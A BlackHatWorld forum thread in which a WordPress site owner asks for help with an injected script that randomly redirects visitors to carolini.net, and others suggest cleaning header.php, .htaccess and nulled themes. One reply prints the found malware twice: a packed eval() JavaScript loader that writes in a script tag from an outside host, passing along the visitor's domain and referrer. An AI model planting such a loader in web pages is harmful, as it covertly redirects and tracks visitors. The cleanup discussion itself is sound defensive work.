To: Owner of carolini.net - You're a dickhead

rasmusk

rasmusk

Senior Member
Joined
Oct 4, 2012
Messages
928
Reaction score
368
Who'ever det owner of carolini . net is - Youre a dickhead. I've spent thousands of hours getting content on my authority site and earning more than 50 USD a day.

I wondered why statistics was fucked up.. Now I know why.

Someone installed a script on my website, redirecting people to carolini.net(which redirects twice). The sick thing of this script is, that it only does it after 5-15 clicks in a random interval, so the webmaster(me) wont find out so easy.

Seriously? I need help to get this fixed. I will pay trough moneybookers to cleanse this from all my wordpress sites. Also money to get identity of this guy so I can file a police report. Cheers.
 
Advertise on BHW
Replace the header.php file with an original and send me the reward. Good luck

Ah shit just saw your -7 rep; guess I've been trolled....
 
Oh man im sorry to hear that. U can do a whois on the site just google it up sometimes the owners info comes out. Other than that dont what to tell you buddy. Good luck
 
Make sure to replace header.php AND it is important to take a good hard look at your htaccess file too for any sneaky redirects.


rasmusk said:
Who'ever det owner of carolini . net is - Youre a dickhead. I've spent thousands of hours getting content on my authority site and earning more than 50 USD a day.

I wondered why statistics was fucked up.. Now I know why.

Someone installed a script on my website, redirecting people to carolini.net(which redirects twice). The sick thing of this script is, that it only does it after 5-15 clicks in a random interval, so the webmaster(me) wont find out so easy.

Seriously? I need help to get this fixed. I will pay trough moneybookers to cleanse this from all my wordpress sites. Also money to get identity of this guy so I can file a police report. Cheers.
Click to expand...
 
if you are using shared hosting go private or change hosting.
 
does anybody here has a solution to this problem? I always got this carolini.net about 2 times this day on my site! This gets frustrating!
 
What theme are you using? is your theme nulled?

check your header and footer for encrypted code.

Also check your htaccess and ask help on your to see if you are the only one affected.
 
Who is your host? A clients website is with hostgator and they got a malicious plugin installed on their wp site, HG emailed me straight away and said they removed it. Pretty good service
 
Figured it out. The header.php got malicious script on it.
Code: 
<script type="text/javascript">eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('0.f(\'<2\'+\'3 5="6/7" 8="9://a.b/e/o/g?d=\'+0.h+\'&i=\'+j(0.k)+\'&c=\'+4.l((4.m()*n)+1)+\'"></2\'+\'3>\');',25,25,'document||scr|ipt|Math|type|text|javascript|src|http|themenest|net|||platform|write|track|domain|r|encodeURIComponent|referrer|floor|random|1000|script'.split('|'),0,{}));</script>
 
deesonarnibal said:
Figured it out. The header.php got malicious script on it.
Code: 
<script type="text/javascript">eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('0.f(\'<2\'+\'3 5="6/7" 8="9://a.b/e/o/g?d=\'+0.h+\'&i=\'+j(0.k)+\'&c=\'+4.l((4.m()*n)+1)+\'"></2\'+\'3>\');',25,25,'document||scr|ipt|Math|type|text|javascript|src|http|themenest|net|||platform|write|track|domain|r|encodeURIComponent|referrer|floor|random|1000|script'.split('|'),0,{}));</script>
Click to expand...

My advice is to remove your theme completely.. then download a clean one. I prefer to scan the theme with exploitscanner on WP and then scan it using TAC.
 
A caution to all who download "free/cracked" themes. Got a dodgy plug-in that tried to do the same thing before. Luckily noticed pretty soon afterwards, but just goes to show...
 
I can nullify your theme completely so that you don't have to face the trouble again. I won't do that for free :P
PM me if you need it :)
 
Run a malware scan and detect where the hidden script is. Go and remove it manually and you are done.
 
Oh dude! OP and this dude: http://www.blackhatworld.com/blackhat-seo/members/304244-deesonarnibal.html is the same guy? How will you ever learn not to own more than 1 account or at least don't be caught!

Commenting on your own thread - being a dickhead!... And next what? Faking your iTrader score?

I see the mighty Ban Hammer of Thor coming your way!
 
Last edited:
Advertise on BHW
You must log in or register to reply here.
Sign up now!

Main Menu

Home Main Forum List Black Hat SEO White Hat SEO BHW Newbie Guide Blogging Black Hat Tools Social Networking Downloads

Marketplace

Content / Copywriting Hosting Images, Logos & Videos Proxies For Sale SEO - Link building SEO - Packages Social Media Social Media - Panels Web Design Misc

Making Money

Affiliate Programs Hire a Freelancer Making Money Pay Per Click Site Flipping

BlackHatWorld

BHW Merch Forum Suggestions & Feedback Introductions Lounge Dispute Resolution

Other

Domain Name Forum IM Journeys Web Hosting Newsletter
Back
Top